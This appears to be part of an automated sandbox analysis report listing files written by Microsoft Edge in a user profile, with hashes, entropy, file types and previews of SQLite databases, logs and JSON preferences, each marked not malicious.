                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a2be33b3-3646-414c-ace3-b395cfb3abc7.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e427240c-fc01-4719-9944-fbc94e76a460.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):420
                                                                                                                                                                                                                                                                                Entropy (8bit):5.26161354640277
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvW2C3+q2Pwkn23oH+TcwtzjqEKj0QMxIFUtdW2wZmwrW2pFGEVkwOwkn23oH+f:7HvYfYebvqBZFUtO/1Fz5JfYebvqBaJ
                                                                                                                                                                                                                                                                                MD5:325B60D54AA04798A74BCC5CC9A0A592
                                                                                                                                                                                                                                                                                SHA1:40861872308F26AB5F1638021C203B487BADBC61
                                                                                                                                                                                                                                                                                SHA-256:8EF5DCD5094EF92D4C08B4102CF830B818A9877440C90B6CF000700C9E271636
                                                                                                                                                                                                                                                                                SHA-512:03B74CC81965BF3BB0B238757737FA7E977DD4072A00932F8ED26F119CEA9B3E11E2D44CDB5D3FC51ED3F6ADC7DEB97E5E2E3D5B213D80B867A03203A9FFF626
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:45.782 2358 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/03/08-18:52:45.784 2358 Recovering log #3.2025/03/08-18:52:45.787 2358 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):420
                                                                                                                                                                                                                                                                                Entropy (8bit):5.26161354640277
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvW2C3+q2Pwkn23oH+TcwtzjqEKj0QMxIFUtdW2wZmwrW2pFGEVkwOwkn23oH+f:7HvYfYebvqBZFUtO/1Fz5JfYebvqBaJ
                                                                                                                                                                                                                                                                                MD5:325B60D54AA04798A74BCC5CC9A0A592
                                                                                                                                                                                                                                                                                SHA1:40861872308F26AB5F1638021C203B487BADBC61
                                                                                                                                                                                                                                                                                SHA-256:8EF5DCD5094EF92D4C08B4102CF830B818A9877440C90B6CF000700C9E271636
                                                                                                                                                                                                                                                                                SHA-512:03B74CC81965BF3BB0B238757737FA7E977DD4072A00932F8ED26F119CEA9B3E11E2D44CDB5D3FC51ED3F6ADC7DEB97E5E2E3D5B213D80B867A03203A9FFF626
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:45.782 2358 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/03/08-18:52:45.784 2358 Recovering log #3.2025/03/08-18:52:45.787 2358 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                                                                                                Entropy (8bit):5.203224942234633
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMqL+q2Pwkn23oH+TcwtpIFUtdWMFX21ZmwrWMRRtXgLVkwOwkn23oH+Tcwt7:7hqyvYfYebmFUt7FXQ/9RrXgR5JfYeb7
                                                                                                                                                                                                                                                                                MD5:0DD9EEE2A4157F386782EC5C227F9896
                                                                                                                                                                                                                                                                                SHA1:524C42199F1DD7FEBDBA41110F594168DC8BB309
                                                                                                                                                                                                                                                                                SHA-256:3C3FFB8FFA29322349B0D9958B66316F833E1409CFA65BDFEC5420118636FC0A
                                                                                                                                                                                                                                                                                SHA-512:FEECE6709DD5D00EA3566E5978F30D169E708983567C9BAEE3C2FBE1B7B8D3A3B609EF7E8921A183BEA6A6EBC73A3BEB724C9F0EF6CBF1BC2400E0469DBB3F69
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.068 22a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/03/08-18:52:29.073 22a8 Recovering log #3.2025/03/08-18:52:29.114 22a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                                                                                                Entropy (8bit):5.203224942234633
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMqL+q2Pwkn23oH+TcwtpIFUtdWMFX21ZmwrWMRRtXgLVkwOwkn23oH+Tcwt7:7hqyvYfYebmFUt7FXQ/9RrXgR5JfYeb7
                                                                                                                                                                                                                                                                                MD5:0DD9EEE2A4157F386782EC5C227F9896
                                                                                                                                                                                                                                                                                SHA1:524C42199F1DD7FEBDBA41110F594168DC8BB309
                                                                                                                                                                                                                                                                                SHA-256:3C3FFB8FFA29322349B0D9958B66316F833E1409CFA65BDFEC5420118636FC0A
                                                                                                                                                                                                                                                                                SHA-512:FEECE6709DD5D00EA3566E5978F30D169E708983567C9BAEE3C2FBE1B7B8D3A3B609EF7E8921A183BEA6A6EBC73A3BEB724C9F0EF6CBF1BC2400E0469DBB3F69
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.068 22a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/03/08-18:52:29.073 22a8 Recovering log #3.2025/03/08-18:52:29.114 22a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                                                                                                MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                                                                                                SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                                                                                                SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                                                                                                SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                                                                Entropy (8bit):1.067166668989829
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:QSqzWMMUfTbnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYe4an6:QrzWMff/nzkkqtXnTK+hNH+5EVumBR
                                                                                                                                                                                                                                                                                MD5:FA6C888F4EA43789ADC5F73B70AB77AA
                                                                                                                                                                                                                                                                                SHA1:3737A8CDBDBE33E3260B438945BEFE79FF5E630B
                                                                                                                                                                                                                                                                                SHA-256:B0A9F249ECF66C9EE67187BCC64ED066BFD294AABF333497779ADF6F3CFE3B7A
                                                                                                                                                                                                                                                                                SHA-512:1164FD5E37D0D5FF15377FEB446AA595355CE30401352A43D9AA6CE7B9B191F5E5D2C84B2123219E1FE0572311B041251B2E0A2300DB08E1919E9DF5E559CA5E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):14336
                                                                                                                                                                                                                                                                                Entropy (8bit):0.7836182415564406
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                                                                                                                                MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                                                                                                                                SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                                                                                                                                SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                                                                                                                                SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                Entropy (8bit):0.46588068299285695
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0LzsWY:v7doKsKuKZKlZNmu46yjx0Lk
                                                                                                                                                                                                                                                                                MD5:A4AEBECE2B1B04EED5817438A72E9303
                                                                                                                                                                                                                                                                                SHA1:6C87784094A2C9F2B9F28D67EEEB143759AC654B
                                                                                                                                                                                                                                                                                SHA-256:6E7EBBCBE1645A0631F1D1BD3DC993B0CCD29007FADC1EC67CECBD05A20D8140
                                                                                                                                                                                                                                                                                SHA-512:8EB7746DD5E52C21B2B56267C293392FF3045CC8A515513C446332413CD9BC34BD5C6DB5C961D77A4D7F098AA2D041D45DB737906B7AD0A6F5E875267E6A941A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c0e5d86f-9f84-4223-8b15-3ba599dde065.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):14551
                                                                                                                                                                                                                                                                                Entropy (8bit):5.261558762678679
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVrJ9pQTryZiuaba4uypPJ5Kw4rNaI0lY7gN128Kpj+FbFr1Qw/3voz1f:sVrLAJu4PJ5KiIjfpU/Qwn8
                                                                                                                                                                                                                                                                                MD5:979BD147A974D750A2341519D8E34FF9
                                                                                                                                                                                                                                                                                SHA1:F6FEEB03C2AA19928BCF4228B6328E71931AA59C
                                                                                                                                                                                                                                                                                SHA-256:51BD19CC5B70EF165D458159BF16DE2ABADD2C54262DFFF4F0704198C13DFDDF
                                                                                                                                                                                                                                                                                SHA-512:55719DAB4A2CA1CAE592DD9933974D515D36944DACEB23DF3838AD7991DFFB157F3E56907580AC49981330318E61BB50FA422EA0506AACF64014813EAEB212EF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c52e009e-84cd-4d7e-9296-c58d0de56a7d.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):14661
                                                                                                                                                                                                                                                                                Entropy (8bit):5.259808132192377
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVrJ9pQTryZiuaba4uypPJ5Kw4rNaI0lY7gN128Kpj+FbFr1Qw/3Yoz1f:sVrLAJu4PJ5KiIjfpU/Qwg8
                                                                                                                                                                                                                                                                                MD5:C06378BDCE333DA2C2422F95BDE0D101
                                                                                                                                                                                                                                                                                SHA1:9638DEF01E8BA30B1C7F715AE35C5ECC87DBF015
                                                                                                                                                                                                                                                                                SHA-256:C14F1687B886CEF507F85FE397405461E2C6530FD064299AFF1C00CE3B3C012C
                                                                                                                                                                                                                                                                                SHA-512:113AC8C5A2DC564F3B5C431769ED8601AF896BA662BC720D1784AB4B185B38941C92B8FCAD8EAC02D6A6E04335536700EA0A3A7838A10EFC7553B1CA4D636E2B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

